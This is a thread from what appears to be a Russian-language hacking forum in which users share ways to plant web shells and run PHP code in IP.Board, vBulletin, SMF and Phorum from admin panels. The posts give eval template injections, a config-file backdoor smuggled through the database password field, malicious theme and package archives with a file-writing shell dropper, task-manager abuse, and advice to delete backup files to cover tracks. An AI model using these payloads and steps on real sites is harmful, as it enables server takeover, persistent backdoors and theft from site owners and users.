Старый 24.09.2010, 15:25   #11
Белый Тигр
 
Аватар для Белый Тигр
 
Регистрация: 29.08.2010
Сообщений: 148
Репутация: 25
По умолчанию

IPB 2.* (возможно и на 3 покатит, не проверял)
Нашёл в процессе пыток одного форума (версия 2.3.6). Все перчисленные здесь варианты я пробовал, но они обламывались следующим:
1. На сервере как php-скрипты опознавались только .php-файлы. То есть заливка через фото phtml/php3/php5/и т.д.-файлов не помогала.
2. У меня были права обычного администратора, а не главного. Так что я не мог работать с SQL-инструментарием и вбивать PHP-код в настройки форума.
И на помощь вдруг пришли шаблоны Вообщем заходим в редактирование текущего дизайна (или любого, если пользователи сами могут выбирать себе внешний вид), выбираем любой шаблон. Я выбрал skin_global/global_header. В него пишем следующее:
Цитата:
<if="$this->ipsclass->input['testKey'] = 123">
<if="eval($this->ipsclass->input['code'])"></if>
</if>
Я поместил это сразу после
Цитата:
<!--ipb.javascript.start-->
После сохранения шаблона, в кеш-файле данный код превращается в
Цитата:
$IPBHTML .= "<!--ipb.javascript.start-->
" . (($this->ipsclass->input['testKey'] = 123) ? ("
<h1>" . ((eval($this->ipsclass->input['code'])) ? ("") : ("")) . "</h1>
") : ("")) . "
...тут идёт основной JS-код...
Теперь обращаемся например вот так -
/index.php?testKey=123&code=phpinfo();
Видим phpinfo. После этого можно смело писать эксплоит который в code POST-методом будет пересылать код шелла.
Плюс метода в том, что он не создаёт лишних файлов.
Минус - дизайн отмечается как изменённый. Хотя если он уже изменялся владельцами и имеет такую отметку, то можно не беспокоиться.
Белый Тигр вне форума   Ответить с цитированием
Старый 18.10.2010, 11:13   #12
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от Ctacok Посмотреть сообщение
IP.Board 2.3.6
[!] Везде нужны права админа, вы понеле?
Через SQL Запрос:
file_priv

('<?PHP eval($_GET[c]); ?>')
(Раскрыть путь можно здесь:
Выполнение кода:
Работает только под Windows. Т.к. нужны права для записи на папку /sources/tasks/
Видео: https://rdot.org/forum/showpost.php?p=4811&postcount=2
Описание второго метода:
Invision Power Board. IPB 2.3.6 (Возможно и более ранее)
Нужно: Windows ( Или права на запись папки /sources/tasks )
1. Идём в Общие настройки.
Цитата:
/admin/index.php?adsess=ваша сессия&section=tools&act=op&code=setting_vie w&conf_group=10
Меняем Путь к директории 'upload', обычно это /path_to_ipb/uploads на /path_to_ipb/sources/tasks
Сохраняемся.
2. Идём в index.php?act=UserCP&CODE=24
И загружаем шелл ( Лучше не шелл, а copy('название файла','shell.php') or die(''); )
(Для простоты заливки проще было бы добавить в список разрешённых загрузок .php)
После успешной заливки смотрим в исходный код странички.
К примеру:
Код:
<div class="formsubtitle">Ваш текущий аватар</div>
<div class="tablepad" align="center"><img src='http://tbsource/ipb/sources/tasks/av-1.txt?_time=1287410758' border='0' width='90' height='90' alt='' /><br />Загруженный файл 90x90</div>
http://tbsource/ipb/sources/tasks/av-1.txt и есть нужный нам файл.
3. Идём в /admin/index.php?adsess=ваша_сессия&section=too ls&act=task
Выбераем любую запись.
Смотрим в поле "PHP файл задачи для запуска"
Меняем на av-1.txt и сохраняем.
Перед нами окно со списком задач. Выбераем запись в которую мы записали путь до нашего скрипта. Жмём запустить. Выполнение кода прошло успешно
Спасибо за внимание.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 06.11.2010, 19:51   #13
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

vBulletin® v3.8.2 ( Возможно более ранее/позже )
Кто-то назовёт это просто залитие шелла, кто-то выполнение кода, каждому решать по своему. Я лишь покажу как заливку шелла.
Нужны права админа.
Шаг 1: Идём в управление смайлами.
Цитата:
/admincp/image.php?do=viewimages&table=smilie&imagecategory id=1
Выбираем любой понравившийся.
Качаем к себе. Открываем любым текстовым редактором. И в середине пишем <?PHP phpinfo(); ?>
Шаг 2: Заливаем смайл.
Цитата:
/admincp/image.php?do=upload&table=smilie
В Title и т.п. вбиваем что хотим.
Ок, залили, проверяем
Цитата:
http://your_forum/images/smiles/название_вашего_смайла.gif
Если доступен идём далее.
Шаг 3: Идём в Task Manager.
Цитата:
/admincp/cronadmin.php?do=modify
Выбираем любой, выбираем Edit в input select, жмём Go.
Нас интересует: Filename.
Меняем его на
Цитата:
./images/smiles/название_вашего_смайла.gif
Сохраняем. ( Скорее всего ваша задача окажется внизу. )
Шаг 4: Выполняем код.
Находим нашу задачу, и жмём Run Now
Данный способ находил уже oRb, но он был в приватах видимо.
Спасибо за внимание.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 21.12.2010, 19:26   #14
525
 
Регистрация: 06.07.2010
Сообщений: 34
Репутация: 0
По умолчанию

Заливка шелла в vBulletin.
1.AdminCP>Styles & Templates>Download / Upload Styles
2.Вибираєм наш шелл в .xml , Ignore Style Version - YES > Import
3.Обратно к Style Manager кликаем по загруженном файлу и видим наш шелл

шелл :
http://pastebin.com/ybZqXiDH

Источник:http://insecurity.ro/blog/shelling-vbulletin-4-0-x-3-8-x-xml/
525 вне форума   Ответить с цитированием
Старый 08.01.2011, 09:14   #15
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Код:
http://site.com/index.php?action=admin
Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

Код:
http://site.com/Themes/wso/wso.php
т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива

Иногда при таком способе шелл не открывается. Идем в раздел Packages->Options->Cleanup permissions->"All files are writable". Радуемся
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 15.01.2011, 15:11   #16
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Что с mybb? Поискал ничего не нашел =\ Наверное придется самому копать =)
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 15.01.2011, 15:26   #17
Pr0xor
 
Регистрация: 27.08.2010
Сообщений: 158
Репутация: 69
По умолчанию

Вот интересный эксплоит
http://www.80vul.com/exp/mybb.txt
правда версия не новая
И еще для более старых версии можно здесь глянуть
mybb site:waraxe.us
Pr0xor вне форума   Ответить с цитированием
Старый 25.03.2011, 20:26   #18
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию phorum

Версия: phorum-3.4.6
Цитата:
Copyright (C) 2000 Phorum Development Team
http://www.phorum.org
Зависимости: Нужны права админа.

Наткнулся совершенно случайно, версия оч старая, нагуглил архив, скал, стал изучать исходники, и почти сразу наткнулся на то что конфигурация форума сохраняется в PHP файл:
Код:
C:\wamp\www\phorum-3.4.6\phorum-3.4.6\admin\settings\forums.php
Что дает нам возможность внедрить в конфиги пару своих строк =)
Последние строки в конфиг файле:

PHP код:
  // database variables
  
$PHORUM['DatabaseServer']='';
  
$PHORUM['DatabaseName']='';
  
$PHORUM['DatabaseUser']='';
  
$PHORUM['DatabasePassword']='';

?> 
Чтоб не нарушить структуру файла, идем в раздел Конфигурации БД:
Код:
http://www.SITE.COM/forum/admin/index.php?page=db
В поле Password: дописываем к текущему паролю строку:
Код:
'; @eval(stripslashes($_GET['cmd'])); echo '
И получаем бэкдор по пути:
Код:
http://www.SITE.COM/forum/admin/settings/forums.php
b3 вне форума   Ответить с цитированием
Старый 14.06.2011, 23:30   #19
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

SMF 2.0
Сайт: http://www.simplemachines.org/
Необходимы права администратора

1. Идем в админку и выбираем Package Manager (http://localhost/smf_2_0/index.php?action=admin;area=packages).
2. Выбираем Download Packages.
3. Пакет с шеллом должен включать в себя файл package-info.xml с похожей структурой:
Код:
<?xml version="1.0"?>
<!DOCTYPE package-info SYSTEM "http://www.simplemachines.org/xml/package-info">
<package-info xmlns="http://www.simplemachines.org/xml/package-info" xmlns:smf="http://www.simplemachines.org/">
	<id>WSO by oRb</id>
	<name>WSO</name>
	<version>2.5</version>
	<type>modification</type>
	<install for="2.0, 2.0 RC4, 2.0 RC5, 2.0.1 - 2.0.99">
		<database>install_db.php</database>
	</install>
	<uninstall for="2.0, 2.0 RC4, 2.0 RC5, 2.0.1 - 2.0.99">
		<database>uninstall_db.php</database>
	</uninstall>
</package-info>
Так же необходимо наличие файлов install_db.php и uninstall_db.php (имена можно задать свои).
В install_db.php включен такой код:
PHP код:
<?php
file_put_contents
($boarddir.'/Themes/default/Сonfig.php''КОД_ШЕЛЛА');
?>
4. Выбираем Package to Upload. Package - это zip-архив с файлами package-info.xml, install_db.php и uninstall_db.php.
5. После заливки пакета выбираем [ Install Mod ]. Еще раз нажимаем Install Now и получаем шелл по адресу - http://localhost/smf_2_0/Themes/default/Сonfig.php
6. После установки шелла из папки /Packages/backups/ надо удалить файлы, которые содержат в имени имя пакета, который был использован.

Пример пакета - скачать

(Возможно, cпособ работает не только на версии 2.0)
============
Способ, предложенный здесь, так же актуален для данной версии.
Svet вне форума   Ответить с цитированием
Старый 03.07.2011, 13:23   #20
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от Белый Тигр Посмотреть сообщение
IPB 2.* (возможно и на 3 покатит, не проверял)
Нашёл в процессе пыток одного форума (версия 2.3.6). Все перчисленные здесь варианты я пробовал, но они обламывались следующим:
1. На сервере как php-скрипты опознавались только .php-файлы. То есть заливка через фото phtml/php3/php5/и т.д.-файлов не помогала.
2. У меня были права обычного администратора, а не главного. Так что я не мог работать с SQL-инструментарием и вбивать PHP-код в настройки форума.
И на помощь вдруг пришли шаблоны Вообщем заходим в редактирование текущего дизайна (или любого, если пользователи сами могут выбирать себе внешний вид), выбираем любой шаблон. Я выбрал skin_global/global_header. В него пишем следующее:

Я поместил это сразу после

После сохранения шаблона, в кеш-файле данный код превращается в

Теперь обращаемся например вот так -
/index.php?testKey=123&code=phpinfo();
Видим phpinfo. После этого можно смело писать эксплоит который в code POST-методом будет пересылать код шелла.
Плюс метода в том, что он не создаёт лишних файлов.
Минус - дизайн отмечается как изменённый. Хотя если он уже изменялся владельцами и имеет такую отметку, то можно не беспокоиться.
Подскажите пример сплойта
z0mbie вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot